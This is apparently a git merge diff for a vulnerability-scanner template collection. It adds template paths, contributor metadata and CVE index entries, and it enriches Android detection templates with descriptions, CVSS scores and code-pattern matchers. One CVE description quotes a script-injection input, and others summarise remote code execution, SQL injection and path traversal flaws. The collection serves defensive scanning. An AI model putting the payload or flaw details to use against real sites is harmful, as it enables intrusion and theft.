Merge branch 'main' into remove-comments
commit
0ccffd229a
|
@ -1,16 +1,46 @@
|
||||||
|
file/keys/adafruit-key.yaml
|
||||||
|
file/keys/adobe/adobe-client.yaml
|
||||||
|
file/keys/airtable-key.yaml
|
||||||
|
file/keys/algolia-key.yaml
|
||||||
|
file/keys/alibaba/alibaba-key-id.yaml
|
||||||
|
file/keys/alibaba/alibaba-secret-id.yaml
|
||||||
|
file/keys/asana/asana-clientid.yaml
|
||||||
|
file/keys/asana/asana-clientsecret.yaml
|
||||||
|
file/keys/atlassian/atlassian-api-token.yaml
|
||||||
file/webshell/asp-webshell.yaml
|
file/webshell/asp-webshell.yaml
|
||||||
file/webshell/jsp-webshell.yaml
|
file/webshell/jsp-webshell.yaml
|
||||||
file/webshell/php-webshell.yaml
|
file/webshell/php-webshell.yaml
|
||||||
http/cnvd/2022/CNVD-2022-86535.yaml
|
http/cnvd/2022/CNVD-2022-86535.yaml
|
||||||
|
http/cves/2012/CVE-2012-5321.yaml
|
||||||
http/cves/2018/CVE-2018-6530.yaml
|
http/cves/2018/CVE-2018-6530.yaml
|
||||||
|
http/cves/2023/CVE-2023-0297.yaml
|
||||||
http/cves/2023/CVE-2023-28121.yaml
|
http/cves/2023/CVE-2023-28121.yaml
|
||||||
|
http/cves/2023/CVE-2023-2822.yaml
|
||||||
|
http/default-logins/esafenet-cdg-default-login.yaml
|
||||||
|
http/default-logins/pyload/pyload-default-login.yaml
|
||||||
http/exposed-panels/arangodb-web-Interface.yaml
|
http/exposed-panels/arangodb-web-Interface.yaml
|
||||||
http/exposed-panels/arcserve-panel.yaml
|
http/exposed-panels/arcserve-panel.yaml
|
||||||
|
http/exposed-panels/c2/hookbot-rat.yaml
|
||||||
http/exposed-panels/cloudpanel-login.yaml
|
http/exposed-panels/cloudpanel-login.yaml
|
||||||
http/exposed-panels/dell-idrac.yaml
|
http/exposed-panels/dell-idrac.yaml
|
||||||
http/exposed-panels/efak-login-panel.yaml
|
http/exposed-panels/efak-login-panel.yaml
|
||||||
http/exposed-panels/pritunl-panel.yaml
|
http/exposed-panels/pritunl-panel.yaml
|
||||||
|
http/exposed-panels/pyload-panel.yaml
|
||||||
http/exposed-panels/shell-box.yaml
|
http/exposed-panels/shell-box.yaml
|
||||||
http/exposed-panels/untangle-admin-login.yaml
|
http/exposed-panels/untangle-admin-login.yaml
|
||||||
http/exposed-panels/uptime-kuma-panel.yaml
|
http/exposed-panels/uptime-kuma-panel.yaml
|
||||||
http/exposures/configs/collibra-properties.yaml
|
http/exposures/configs/collibra-properties.yaml
|
||||||
|
http/exposures/files/pnpm-lock.yaml
|
||||||
|
http/exposures/tokens/adafruit/adafruit-api-key.yaml
|
||||||
|
http/exposures/tokens/adobe/adobe-client-id.yaml
|
||||||
|
http/exposures/tokens/airtable/airtable-api-key.yaml
|
||||||
|
http/exposures/tokens/algolia/algolia-api-key.yaml
|
||||||
|
http/exposures/tokens/alibaba/alibaba-accesskey-id.yaml
|
||||||
|
http/exposures/tokens/alibaba/alibaba-secretkey-id.yaml
|
||||||
|
http/exposures/tokens/asana/asana-client-id.yaml
|
||||||
|
http/exposures/tokens/asana/asana-client-secret.yaml
|
||||||
|
http/exposures/tokens/atlassian-token.yaml
|
||||||
|
http/misconfiguration/unauth-temporal-web-ui.yaml
|
||||||
|
misconfiguration/proxy/open-proxy-external.yaml
|
||||||
|
network/misconfig/apache-dubbo-unauth.yaml
|
||||||
|
network/misconfig/apache-rocketmq-broker-unauth.yaml
|
||||||
|
|
|
@ -25,7 +25,9 @@ tags:
|
||||||
files:
|
files:
|
||||||
- http/cves/2006/CVE-2006-1681.yaml
|
- http/cves/2006/CVE-2006-1681.yaml
|
||||||
- http/cves/2007/CVE-2007-5728.yaml
|
- http/cves/2007/CVE-2007-5728.yaml
|
||||||
|
- http/cves/2011/CVE-2011-4618.yaml
|
||||||
- http/cves/2014/CVE-2014-9608.yaml
|
- http/cves/2014/CVE-2014-9608.yaml
|
||||||
|
- http/cves/2018/CVE-2018-5316.yaml
|
||||||
- http/cves/2018/CVE-2018-5233.yaml
|
- http/cves/2018/CVE-2018-5233.yaml
|
||||||
- http/cves/2019/CVE-2019-14696.yaml
|
- http/cves/2019/CVE-2019-14696.yaml
|
||||||
- http/cves/2020/CVE-2020-11930.yaml
|
- http/cves/2020/CVE-2020-11930.yaml
|
||||||
|
|
|
@ -1380,6 +1380,15 @@
|
||||||
}
|
}
|
||||||
},
|
},
|
||||||
{
|
{
|
||||||
|
"author": "noraj",
|
||||||
|
"links": {
|
||||||
|
"github": "https://github.com/noraj",
|
||||||
|
"twitter": "https://twitter.com/noraj_rawsec",
|
||||||
|
"linkedin": "",
|
||||||
|
"website": "https://pwn.by/noraj",
|
||||||
|
"email": ""
|
||||||
|
}
|
||||||
|
},{
|
||||||
"author": "mabdullah22",
|
"author": "mabdullah22",
|
||||||
"links": {
|
"links": {
|
||||||
"github": "https://www.github.com/maabdullah22",
|
"github": "https://www.github.com/maabdullah22",
|
||||||
|
@ -1389,5 +1398,4 @@
|
||||||
"email": ""
|
"email": ""
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
]
|
]
|
|
@ -1783,6 +1783,7 @@
|
||||||
{"ID":"CVE-2023-0126","Info":{"Name":"SonicWall SMA1000 LFI","Severity":"high","Description":"Pre-authentication path traversal vulnerability in SMA1000 firmware version 12.4.2, which allows an unauthenticated attacker to access arbitrary files and directories stored outside the web root directory.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-0126.yaml"}
|
{"ID":"CVE-2023-0126","Info":{"Name":"SonicWall SMA1000 LFI","Severity":"high","Description":"Pre-authentication path traversal vulnerability in SMA1000 firmware version 12.4.2, which allows an unauthenticated attacker to access arbitrary files and directories stored outside the web root directory.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-0126.yaml"}
|
||||||
{"ID":"CVE-2023-0236","Info":{"Name":"WordPress Tutor LMS \u003c2.0.10 - Cross Site Scripting","Severity":"medium","Description":"WordPress Tutor LMS plugin before 2.0.10 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape the reset_key and user_id parameters before outputting then back in attributes. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site, which can allow the attacker to steal cookie-based authentication credentials and launch other attacks. This vulnerability can be used against high-privilege users such as admin.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-0236.yaml"}
|
{"ID":"CVE-2023-0236","Info":{"Name":"WordPress Tutor LMS \u003c2.0.10 - Cross Site Scripting","Severity":"medium","Description":"WordPress Tutor LMS plugin before 2.0.10 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape the reset_key and user_id parameters before outputting then back in attributes. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site, which can allow the attacker to steal cookie-based authentication credentials and launch other attacks. This vulnerability can be used against high-privilege users such as admin.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-0236.yaml"}
|
||||||
{"ID":"CVE-2023-0261","Info":{"Name":"WordPress WP TripAdvisor Review Slider \u003c10.8 - Authenticated SQL Injection","Severity":"high","Description":"WordPress WP TripAdvisor Review Slider plugin before 10.8 is susceptible to authenticated SQL injection. The plugin does not properly sanitize and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by users with a role as low as subscriber. This can lead, in turn, to obtaining sensitive information, modifying data, and/or executing unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2023/CVE-2023-0261.yaml"}
|
{"ID":"CVE-2023-0261","Info":{"Name":"WordPress WP TripAdvisor Review Slider \u003c10.8 - Authenticated SQL Injection","Severity":"high","Description":"WordPress WP TripAdvisor Review Slider plugin before 10.8 is susceptible to authenticated SQL injection. The plugin does not properly sanitize and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by users with a role as low as subscriber. This can lead, in turn, to obtaining sensitive information, modifying data, and/or executing unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2023/CVE-2023-0261.yaml"}
|
||||||
|
{"ID":"CVE-2023-0297","Info":{"Name":"PyLoad 0.5.0 - Pre-auth Remote Code Execution (RCE)","Severity":"critical","Description":"Code Injection in GitHub repository pyload/pyload prior to 0.5.0b3.dev31.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-0297.yaml"}
|
||||||
{"ID":"CVE-2023-0527","Info":{"Name":"Online Security Guards Hiring System - Cross-Site Scripting","Severity":"medium","Description":"A vulnerability was found in PHPGurukul Online Security Guards Hiring System 1.0 and classified as problematic. Affected by this issue is some unknown functionality of the file search-request.php. The manipulation of the argument searchdata with the input \"\u003e\u003cscript\u003ealert(document.domain)\u003c/script\u003e leads to cross site scripting. The attack may be launched remotely.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-0527.yaml"}
|
{"ID":"CVE-2023-0527","Info":{"Name":"Online Security Guards Hiring System - Cross-Site Scripting","Severity":"medium","Description":"A vulnerability was found in PHPGurukul Online Security Guards Hiring System 1.0 and classified as problematic. Affected by this issue is some unknown functionality of the file search-request.php. The manipulation of the argument searchdata with the input \"\u003e\u003cscript\u003ealert(document.domain)\u003c/script\u003e leads to cross site scripting. The attack may be launched remotely.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-0527.yaml"}
|
||||||
{"ID":"CVE-2023-0552","Info":{"Name":"WordPress Pie Register \u003c3.8.2.3 - Open Redirect","Severity":"medium","Description":"WordPress Pie Register plugin before 3.8.2.3 contains an open redirect vulnerability. The plugin does not properly validate the redirection URL when logging in and login out. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2023/CVE-2023-0552.yaml"}
|
{"ID":"CVE-2023-0552","Info":{"Name":"WordPress Pie Register \u003c3.8.2.3 - Open Redirect","Severity":"medium","Description":"WordPress Pie Register plugin before 3.8.2.3 contains an open redirect vulnerability. The plugin does not properly validate the redirection URL when logging in and login out. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2023/CVE-2023-0552.yaml"}
|
||||||
{"ID":"CVE-2023-0562","Info":{"Name":"Bank Locker Management System v1.0 - SQL Injection","Severity":"critical","Description":"A vulnerability was found in PHPGurukul Bank Locker Management System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file index.php of the component Login. The manipulation of the argument username leads to sql injection.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-0562.yaml"}
|
{"ID":"CVE-2023-0562","Info":{"Name":"Bank Locker Management System v1.0 - SQL Injection","Severity":"critical","Description":"A vulnerability was found in PHPGurukul Bank Locker Management System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file index.php of the component Login. The manipulation of the argument username leads to sql injection.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-0562.yaml"}
|
||||||
|
@ -1845,6 +1846,7 @@
|
||||||
{"ID":"CVE-2023-27587","Info":{"Name":"ReadToMyShoe - Generation of Error Message Containing Sensitive Information","Severity":"medium","Description":"ReadToMyShoe generates an error message containing sensitive information prior to commit 8533b01. If an error occurs when adding an article, the website shows the user an error message. If the error originates from the Google Cloud TTS request, it will include the full URL of the request, which contains the Google Cloud API key.\n","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2023/CVE-2023-27587.yaml"}
|
{"ID":"CVE-2023-27587","Info":{"Name":"ReadToMyShoe - Generation of Error Message Containing Sensitive Information","Severity":"medium","Description":"ReadToMyShoe generates an error message containing sensitive information prior to commit 8533b01. If an error occurs when adding an article, the website shows the user an error message. If the error originates from the Google Cloud TTS request, it will include the full URL of the request, which contains the Google Cloud API key.\n","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2023/CVE-2023-27587.yaml"}
|
||||||
{"ID":"CVE-2023-2780","Info":{"Name":"Mlflow \u003c2.3.1 - Local File Inclusion Bypass","Severity":"critical","Description":"Path Traversal: '\\..\\filename' in GitHub repository mlflow/mlflow prior to 2.3.1.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-2780.yaml"}
|
{"ID":"CVE-2023-2780","Info":{"Name":"Mlflow \u003c2.3.1 - Local File Inclusion Bypass","Severity":"critical","Description":"Path Traversal: '\\..\\filename' in GitHub repository mlflow/mlflow prior to 2.3.1.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-2780.yaml"}
|
||||||
{"ID":"CVE-2023-28121","Info":{"Name":"WooCommerce Payments - Unauthorized Admin Access","Severity":"critical","Description":"An issue in WooCommerce Payments plugin for WordPress (versions 5.6.1 and lower) allows an unauthenticated attacker to send requests on behalf of an elevated user, like administrator. This allows a remote, unauthenticated attacker to gain admin access on a site that has the affected version of the plugin activated.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-28121.yaml"}
|
{"ID":"CVE-2023-28121","Info":{"Name":"WooCommerce Payments - Unauthorized Admin Access","Severity":"critical","Description":"An issue in WooCommerce Payments plugin for WordPress (versions 5.6.1 and lower) allows an unauthenticated attacker to send requests on behalf of an elevated user, like administrator. This allows a remote, unauthenticated attacker to gain admin access on a site that has the affected version of the plugin activated.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-28121.yaml"}
|
||||||
|
{"ID":"CVE-2023-2822","Info":{"Name":"Ellucian Ethos Identity CAS - Cross-Site Scripting","Severity":"medium","Description":"A vulnerability was found in Ellucian Ethos Identity up to 5.10.5. It has been classified as problematic. Affected is an unknown function of the file /cas/logout. The manipulation of the argument url leads to cross site scripting. It is possible to launch the attack remotely.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-2822.yaml"}
|
||||||
{"ID":"CVE-2023-2825","Info":{"Name":"GitLab 16.0.0 - Path Traversal","Severity":"critical","Description":"An issue has been discovered in GitLab CE/EE affecting only version 16.0.0. An unauthenticated malicious user can use a path traversal vulnerability to read arbitrary files on the server when an attachment exists in a public project nested within at least five groups\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-2825.yaml"}
|
{"ID":"CVE-2023-2825","Info":{"Name":"GitLab 16.0.0 - Path Traversal","Severity":"critical","Description":"An issue has been discovered in GitLab CE/EE affecting only version 16.0.0. An unauthenticated malicious user can use a path traversal vulnerability to read arbitrary files on the server when an attachment exists in a public project nested within at least five groups\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-2825.yaml"}
|
||||||
{"ID":"CVE-2023-28343","Info":{"Name":"Altenergy Power Control Software C1.2.5 - Remote Command Injection","Severity":"critical","Description":"Altenergy Power Control Software C1.2.5 is susceptible to remote command injection via shell metacharacters in the index.php/management/set_timezone parameter, because of set_timezone in models/management_model.php. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized operations without entering necessary credentials.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-28343.yaml"}
|
{"ID":"CVE-2023-28343","Info":{"Name":"Altenergy Power Control Software C1.2.5 - Remote Command Injection","Severity":"critical","Description":"Altenergy Power Control Software C1.2.5 is susceptible to remote command injection via shell metacharacters in the index.php/management/set_timezone parameter, because of set_timezone in models/management_model.php. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized operations without entering necessary credentials.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-28343.yaml"}
|
||||||
{"ID":"CVE-2023-28432","Info":{"Name":"MinIO Cluster Deployment - Information Disclosure","Severity":"high","Description":"MinIO is susceptible to information disclosure. In a cluster deployment starting with RELEASE.2019-12-17T23-16-33Z and prior to RELEASE.2023-03-20T20-16-18Z, MinIO returns all environment variables, including MINIO_SECRET_KEY and MINIO_ROOT_PASSWORD. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized operations without entering necessary credentials. All users of distributed deployment are impacted.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-28432.yaml"}
|
{"ID":"CVE-2023-28432","Info":{"Name":"MinIO Cluster Deployment - Information Disclosure","Severity":"high","Description":"MinIO is susceptible to information disclosure. In a cluster deployment starting with RELEASE.2019-12-17T23-16-33Z and prior to RELEASE.2023-03-20T20-16-18Z, MinIO returns all environment variables, including MINIO_SECRET_KEY and MINIO_ROOT_PASSWORD. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized operations without entering necessary credentials. All users of distributed deployment are impacted.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-28432.yaml"}
|
||||||
|
|
|
@ -1 +1 @@
|
||||||
b830e8b5ef413ec8d972848bd93b95d8
|
be483aa0e41e51f1744cd9bd05cb8c4d
|
||||||
|
|
|
@ -1,9 +1,14 @@
|
||||||
id: biometric-detect
|
id: biometric-detect
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: Biometric or Fingerprint detect
|
name: Android Biometric/Fingerprint - Detect
|
||||||
author: gaurang
|
author: gaurang
|
||||||
severity: info
|
severity: info
|
||||||
|
description: Android Biometric/Fingerprint permission files were detected.
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
|
||||||
|
cvss-score: 0.0
|
||||||
|
cwe-id: CWE-200
|
||||||
tags: android,file
|
tags: android,file
|
||||||
|
|
||||||
file:
|
file:
|
||||||
|
@ -15,3 +20,5 @@ file:
|
||||||
words:
|
words:
|
||||||
- "android.permission.USE_FINGERPRINT"
|
- "android.permission.USE_FINGERPRINT"
|
||||||
- "android.permission.USE_BIOMETRIC"
|
- "android.permission.USE_BIOMETRIC"
|
||||||
|
|
||||||
|
# Enhanced by md on 2023/05/02
|
||||||
|
|
|
@ -1,9 +1,14 @@
|
||||||
id: improper-certificate-validation
|
id: improper-certificate-validation
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: Improper Certificate Validation
|
name: Android Improper Certificate Validation - Detect
|
||||||
author: gaurang
|
author: gaurang
|
||||||
severity: medium
|
severity: medium
|
||||||
|
description: Android improper certificate validation was detected.
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
|
||||||
|
cvss-score: 5.3
|
||||||
|
cwe-id: CWE-200
|
||||||
tags: android,file
|
tags: android,file
|
||||||
|
|
||||||
file:
|
file:
|
||||||
|
@ -14,3 +19,5 @@ file:
|
||||||
- type: word
|
- type: word
|
||||||
words:
|
words:
|
||||||
- "Landroid/webkit/SslErrorHandler;->proceed()V"
|
- "Landroid/webkit/SslErrorHandler;->proceed()V"
|
||||||
|
|
||||||
|
# Enhanced by md on 2023/05/02
|
||||||
|
|
|
@ -1,9 +1,14 @@
|
||||||
id: content-scheme
|
id: content-scheme
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: Content Scheme Enabled
|
name: Android Content Scheme - Detect
|
||||||
author: gaurang
|
author: gaurang
|
||||||
severity: info
|
severity: info
|
||||||
|
description: Android content scheme enabling was detected.
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
|
||||||
|
cvss-score: 0.0
|
||||||
|
cwe-id: CWE-200
|
||||||
tags: android,file
|
tags: android,file
|
||||||
|
|
||||||
file:
|
file:
|
||||||
|
@ -14,3 +19,5 @@ file:
|
||||||
- type: word
|
- type: word
|
||||||
words:
|
words:
|
||||||
- "android:scheme=\"content\""
|
- "android:scheme=\"content\""
|
||||||
|
|
||||||
|
# Enhanced by md on 2023/05/03
|
||||||
|
|
|
@ -4,6 +4,7 @@ info:
|
||||||
name: Android Debug Enabled
|
name: Android Debug Enabled
|
||||||
author: gaurang
|
author: gaurang
|
||||||
severity: low
|
severity: low
|
||||||
|
description: Android debug enabling was detected.
|
||||||
tags: android,file
|
tags: android,file
|
||||||
|
|
||||||
file:
|
file:
|
||||||
|
|
|
@ -1,13 +1,18 @@
|
||||||
id: deep-link-detect
|
id: deep-link-detect
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: Deep Link Detection
|
name: Android Deep Link - Detect
|
||||||
author: Hardik-Solanki
|
author: Hardik-Solanki
|
||||||
severity: info
|
severity: info
|
||||||
|
description: Android deep link functionality was detected.
|
||||||
reference:
|
reference:
|
||||||
- https://developer.android.com/training/app-links/deep-linking
|
- https://developer.android.com/training/app-links/deep-linking
|
||||||
- https://www.geeksforgeeks.org/deep-linking-in-android-with-example/
|
- https://www.geeksforgeeks.org/deep-linking-in-android-with-example/
|
||||||
- https://medium.com/@muratcanbur/intro-to-deep-linking-on-android-1b9fe9e38abd
|
- https://medium.com/@muratcanbur/intro-to-deep-linking-on-android-1b9fe9e38abd
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
|
||||||
|
cvss-score: 0.0
|
||||||
|
cwe-id: CWE-200
|
||||||
metadata:
|
metadata:
|
||||||
verified: true
|
verified: true
|
||||||
tags: android,file,deeplink
|
tags: android,file,deeplink
|
||||||
|
@ -24,3 +29,5 @@ file:
|
||||||
- "android:host"
|
- "android:host"
|
||||||
- "android:name"
|
- "android:name"
|
||||||
condition: and
|
condition: and
|
||||||
|
|
||||||
|
# Enhanced by md on 2023/05/02
|
||||||
|
|
|
@ -1,9 +1,14 @@
|
||||||
id: dynamic-registered-broadcast-receiver
|
id: dynamic-registered-broadcast-receiver
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: Dynamic Registered Broadcast Receiver
|
name: Android Dynamic Broadcast Receiver Register - Detect
|
||||||
author: gaurang
|
author: gaurang
|
||||||
severity: info
|
severity: info
|
||||||
|
description: Android dynamic broadcast receiver register functionality was detected.
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
|
||||||
|
cvss-score: 0.0
|
||||||
|
cwe-id: CWE-200
|
||||||
tags: android,file
|
tags: android,file
|
||||||
|
|
||||||
file:
|
file:
|
||||||
|
@ -14,3 +19,5 @@ file:
|
||||||
- type: word
|
- type: word
|
||||||
words:
|
words:
|
||||||
- ";->registerReceiver(Landroid/content/BroadcastReceiver;Landroid/content/IntentFilter;)"
|
- ";->registerReceiver(Landroid/content/BroadcastReceiver;Landroid/content/IntentFilter;)"
|
||||||
|
|
||||||
|
# Enhanced by md on 2023/05/02
|
||||||
|
|
|
@ -1,9 +1,14 @@
|
||||||
id: file-scheme
|
id: file-scheme
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: File Scheme Enabled
|
name: Android File Scheme - Detect
|
||||||
author: gaurang
|
author: gaurang
|
||||||
severity: info
|
severity: info
|
||||||
|
description: Android file scheme enabling was detected.
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
|
||||||
|
cvss-score: 0.0
|
||||||
|
cwe-id: CWE-200
|
||||||
tags: android,file
|
tags: android,file
|
||||||
|
|
||||||
file:
|
file:
|
||||||
|
@ -14,3 +19,5 @@ file:
|
||||||
- type: word
|
- type: word
|
||||||
words:
|
words:
|
||||||
- "android:scheme=\"file\""
|
- "android:scheme=\"file\""
|
||||||
|
|
||||||
|
# Enhanced by md on 2023/05/03
|
||||||
|
|
|
@ -1,9 +1,14 @@
|
||||||
id: insecure-provider-path
|
id: insecure-provider-path
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: Insecure Provider Path
|
name: Android Insecure Provider Path - Detect
|
||||||
author: gaurang
|
author: gaurang
|
||||||
severity: medium
|
severity: medium
|
||||||
|
description: Android insecure provider path was detected.
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
|
||||||
|
cvss-score: 5.3
|
||||||
|
cwe-id: CWE-200
|
||||||
tags: android,file
|
tags: android,file
|
||||||
|
|
||||||
file:
|
file:
|
||||||
|
@ -15,3 +20,5 @@ file:
|
||||||
regex:
|
regex:
|
||||||
- "root-path name=\"[0-9A-Za-z\\-_]{1,10}\" path=\".\""
|
- "root-path name=\"[0-9A-Za-z\\-_]{1,10}\" path=\".\""
|
||||||
- "root-path name=\"[0-9A-Za-z\\-_]{1,10}\" path=\"\""
|
- "root-path name=\"[0-9A-Za-z\\-_]{1,10}\" path=\"\""
|
||||||
|
|
||||||
|
# Enhanced by md on 2023/05/02
|
||||||
|
|
|
@ -1,9 +1,14 @@
|
||||||
id: webview-addjavascript-interface
|
id: webview-addjavascript-interface
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: Webview addJavascript Interface Usage
|
name: Android WebView Add Javascript Interface - Detect
|
||||||
author: gaurang
|
author: gaurang
|
||||||
severity: info
|
severity: info
|
||||||
|
description: Android WebView Add Javascript interface usage was detected.
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
|
||||||
|
cvss-score: 5.3
|
||||||
|
cwe-id: CWE-200
|
||||||
tags: android,file
|
tags: android,file
|
||||||
|
|
||||||
file:
|
file:
|
||||||
|
@ -14,3 +19,5 @@ file:
|
||||||
- type: word
|
- type: word
|
||||||
words:
|
words:
|
||||||
- ";->addJavascriptInterface(Ljava/lang/Object;Ljava/lang/String;)V"
|
- ";->addJavascriptInterface(Ljava/lang/Object;Ljava/lang/String;)V"
|
||||||
|
|
||||||
|
# Enhanced by md on 2023/05/02
|
||||||
|
|
|
@ -1,9 +1,14 @@
|
||||||
id: webview-javascript-enabled
|
id: webview-javascript-enabled
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: Webview JavaScript enabled
|
name: WebView JavaScript - Detect
|
||||||
author: gaurang
|
author: gaurang
|
||||||
severity: info
|
severity: info
|
||||||
|
description: WebView Javascript enabling was detected.
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
|
||||||
|
cvss-score: 0.0
|
||||||
|
cwe-id: CWE-200
|
||||||
tags: android,file,javascript
|
tags: android,file,javascript
|
||||||
|
|
||||||
file:
|
file:
|
||||||
|
@ -14,3 +19,5 @@ file:
|
||||||
- type: word
|
- type: word
|
||||||
words:
|
words:
|
||||||
- "Landroid/webkit/WebSettings;->setJavaScriptEnabled(Z)V"
|
- "Landroid/webkit/WebSettings;->setJavaScriptEnabled(Z)V"
|
||||||
|
|
||||||
|
# Enhanced by md on 2023/05/03
|
||||||
|
|
|
@ -1,9 +1,14 @@
|
||||||
id: webview-load-url
|
id: webview-load-url
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: Webview loadUrl usage
|
name: WebView loadUrl - Detect
|
||||||
author: gaurang
|
author: gaurang
|
||||||
severity: info
|
severity: info
|
||||||
|
description: WebView loadUrl usage was detected.
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
|
||||||
|
cvss-score: 0.0
|
||||||
|
cwe-id: CWE-200
|
||||||
tags: android,file
|
tags: android,file
|
||||||
|
|
||||||
file:
|
file:
|
||||||
|
@ -14,3 +19,5 @@ file:
|
||||||
- type: word
|
- type: word
|
||||||
words:
|
words:
|
||||||
- "Landroid/webkit/WebView;->loadUrl(Ljava/lang/String;)V"
|
- "Landroid/webkit/WebView;->loadUrl(Ljava/lang/String;)V"
|
||||||
|
|
||||||
|
# Enhanced by md on 2023/05/02
|
||||||
|
|
|
@ -1,9 +1,14 @@
|
||||||
id: webview-universal-access
|
id: webview-universal-access
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: Webview Universal Access enabled
|
name: Android WebView Universal Access - Detect
|
||||||
author: gaurang
|
author: gaurang
|
||||||
severity: medium
|
severity: medium
|
||||||
|
description: Android WebView Universal Access enabling was detected.
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
|
||||||
|
cvss-score: 5.3
|
||||||
|
cwe-id: CWE-200
|
||||||
tags: android,file
|
tags: android,file
|
||||||
|
|
||||||
file:
|
file:
|
||||||
|
@ -14,3 +19,5 @@ file:
|
||||||
- type: word
|
- type: word
|
||||||
words:
|
words:
|
||||||
- "Landroid/webkit/WebSettings;->setAllowUniversalAccessFromFileURLs(Z)V"
|
- "Landroid/webkit/WebSettings;->setAllowUniversalAccessFromFileURLs(Z)V"
|
||||||
|
|
||||||
|
# Enhanced by md on 2023/05/03
|
||||||
|
|
|
@ -1,13 +1,17 @@
|
||||||
id: configure-aaa-service
|
id: configure-aaa-service
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: Configure AAA service
|
name: Cisco AAA Service Configuration - Detect
|
||||||
author: pussycat0x
|
author: pussycat0x
|
||||||
severity: info
|
severity: info
|
||||||
description: |
|
description: |
|
||||||
Authentication, authorization and accounting (AAA) services provide an authoritative source for managing and monitoring access for devices.
|
Cisco authentication, authorization and accounting service configuration was detected.
|
||||||
reference:
|
reference:
|
||||||
